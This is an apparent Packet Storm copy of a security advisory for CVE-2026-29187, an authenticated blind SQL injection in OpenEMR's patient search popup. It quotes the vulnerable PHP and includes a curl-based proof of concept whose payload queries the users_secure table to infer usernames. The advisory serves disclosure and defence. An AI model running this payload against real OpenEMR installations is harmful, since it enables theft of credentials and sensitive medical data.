📄 OpenEMR 8.0.0.2 SQL Injection

🗓️ 26 Mar 2026 00:00:00Reported by Christophe SUBLETType

packetstorm🔗 packetstorm.news👁 103 Views

OpenEMR search popup SQL injection via unsanitized input.

Reporter	Title	Published	Views	Family All 12
ATTACKERKB	CVE-2026-29187	25 Mar 202622:24	–	attackerkb
Circl	CVE-2026-29187	25 Mar 202623:20	–	circl
CNNVD	OpenEMR SQL注入漏洞	25 Mar 202600:00	–	cnnvd
CVE	CVE-2026-29187	25 Mar 202622:24	–	cve
Cvelist	CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php	25 Mar 202622:24	–	cvelist
EUVD	EUVD-2026-16008	25 Mar 202622:24	–	euvd
NVD	CVE-2026-29187	25 Mar 202623:17	–	nvd
OSV	CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php	25 Mar 202622:24	–	osv
Packet Storm	📄 OpenEMR 8.0.0.2 SQL Injection	20 Apr 202600:00	–	packetstorm
Positive Technologies	PT-2026-28135	25 Mar 202600:00	–	ptsecurity

# CVE-2026-29187 - SQL Injection Vulnerability in new search popup
    
    >  Weakness CWE-89
    >> Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    >> The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.
    
    ### Summary
    
    OpenEMR <8.0.0.3 contains a SQL injection vulnerability in the new search popup that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the new search popup functionality.
    
    ### Details
    
    The vulnerability occurs in the new search popup functionality where user-supplied input in the select relevance column and where condition is directly concatenated into SQL queries without proper sanitization. This allows attackers to inject malicious SQL code.
    
    The vulnerability affects the following lines:
    
     - `interface/new/new_search_popup.php` [line 141](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L141)
     - `interface/new/new_search_popup.php` line [134](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L134) and [136](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L136)
     - `interface/new/new_search_popup.php` line [125](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L125) and [128](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L128)
    
    ```php
            foreach ($_REQUEST as $key => $value) {
                if (!str_starts_with((string) $key, 'mf_')) {
                    continue; // "match field"
                }
                $fldname = substr((string) $key, 3);
                // pubpid requires special treatment.  Match on that is fatal.
                if ($fldname == 'pubpid') {
                    $relevance .= " + 1000 * ( " . add_escape_custom($fldname) . " LIKE ? )";
                    array_push($sqlBindArray, $value);
                } else {
                    $relevance .= " + ( " . add_escape_custom($fldname) . " LIKE ? )";
                    array_push($sqlBindArray, $value);
                }
                $where .= " OR " . add_escape_custom($fldname) . " LIKE ?";
                array_push($sqlBindArraySpecial, $value);
                echo "<input type='hidden' name='" . attr($key) . "' value='" . attr($value) . "' />\n";
                ++$numfields;
            }
    
            $sql = "SELECT *, ( $relevance ) AS relevance, " .
                "DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS " .
                "FROM patient_data WHERE $where " .
                "ORDER BY relevance DESC, lname, fname, mname " .
                "LIMIT " . escape_limit($fstart) . ", " . escape_limit($MAXSHOW) . "";
    
            $sqlBindArray = array_merge($sqlBindArray, $sqlBindArraySpecial);
            $rez = sqlStatement($sql, $sqlBindArray);
    ```
    
    ```sql
    SELECT *, ( 0 + ( <injection> LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR <injection> LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
    ```
    
    ### PoC
    
    ```
    ┌──(kali㉿kali)-[~]
    └─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'https://172.18.0.3/interface/new/new_search_popup.php?mf_"=test'           
    <!DOCTYPE html>
    <html>
    <head>
        
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <link rel="shortcut icon" href="/public/images/logos/core/favicon/favicon.ico?t=1766556932" />
    
    <link rel="stylesheet"  href="/public/themes/style_light.css?v=81" />
    
    <script src="/public/assets/jquery/dist/jquery.min.js?v=81" type="text/javascript"></script>
    <script src="/public/assets/bootstrap/dist/js/bootstrap.bundle.min.js?v=81" type="text/javascript"></script>
    <script src="/library/js/utility.js?v=81" type="text/javascript"></script>
    <script src="/interface/main/tabs/js/include_opener.js?v=81" type="text/javascript"></script>
    <script src="/library/textformat.js?v=81" type="text/javascript"></script>
    <script src="/library/dialog.js?v=81" type="text/javascript"></script>
    
    <style>
      form {
        padding: 0;
        margin: 0;
      }
    
      #searchCriteria {
        text-align: center;
        width: 100%;
        font-size: 0.8rem;
        background-color: var(--gray300);
        font-weight: bold;
        padding: 3px;
      }
    
      #searchResultsHeader th {
        font-size: 0.7rem;
      }
    
      #searchResults {
        width: 100%;
        height: 80%;
        overflow: auto;
      }
    
      #searchResults table {
        width: 100%;
        border-collapse: collapse;
        background-color: var(--white);
      }
    
      #searchResults tr {
        cursor: pointer;
      }
    
      #searchResults td {
        font-size: 0.7rem;
        border-bottom: 1px solid var(--gray200);
      }
    
      .topResult {
        background-color: #ff9919;
      }
    
      .billing {
        color: var(--danger);
        font-weight: bold;
      }
    
      .highlight {
        background-color: var(--info);
        color: var(--white);
      }
    </style>
    </head>
    <body class="body_top">
        <form method='post' action='new_search_popup.php' name='theform'>
            <input type="hidden" name="csrf_token_form" value="8d463d08b7f4e590085af22b77cfb2d3b921cb73" />
            <input type='hidden' name='fstart' value='0' />
            <input type='hidden' name='mf_"' value='test' />
    SQL Statement failed on preparation: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,&#039;%m/%d/%Y&#039;) as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100'<br>
    <h2><font color='red'>Query Error</font></h2><p><font color='red'>ERROR:</font> query failed: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100</p><p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patien...' at line 1</font></p><br />/var/www/localhost/htdocs/openemr/interface/new/new_search_popup.php at 141:sqlStatement                                                                                                                                                                                                                                            
    ┌──(kali㉿kali)-[~]
    └─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'http://172.18.0.3/interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%'
    
    ┌──(kali㉿kali)-[~]
    └─$ 
    ```
    
    There are multiple techniques to exploit it; one of them is a boolean-based attack, which works using the last payload:
    
    ```sql
    SELECT *, ( 0 + ( (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
    ```
    
    ### Impact
    
     - Unauthorized access to database information
     - Potential data breach of sensitive medical information
     - Server-side code execution (in some cases)
     - Database compromise
    
    ### Vulnerability Fix Process
    
    1. Assess and validate the vulnerability
    2. Request or assign a CVE ID
    3. Create a private fork or private branch
    4. Develop the fix
    5. Write regression and security tests
    6. Prepare release notes and security advisory draft
    7. Publish the fix (code merge) and release a patched version
    8. Publicly disclose the vulnerability
    
    ### Credits
    
     - Researcher: Christophe SUBLET
     - Organization: Grenoble INP - Esisar, UGA
     - Project: CyberSkills, Orion

26 Mar 2026 00:00Current

5.9Medium risk

Vulners AI Score5.9

CVSS 3.18.1 - 8.8

EPSS0.00473

SSVC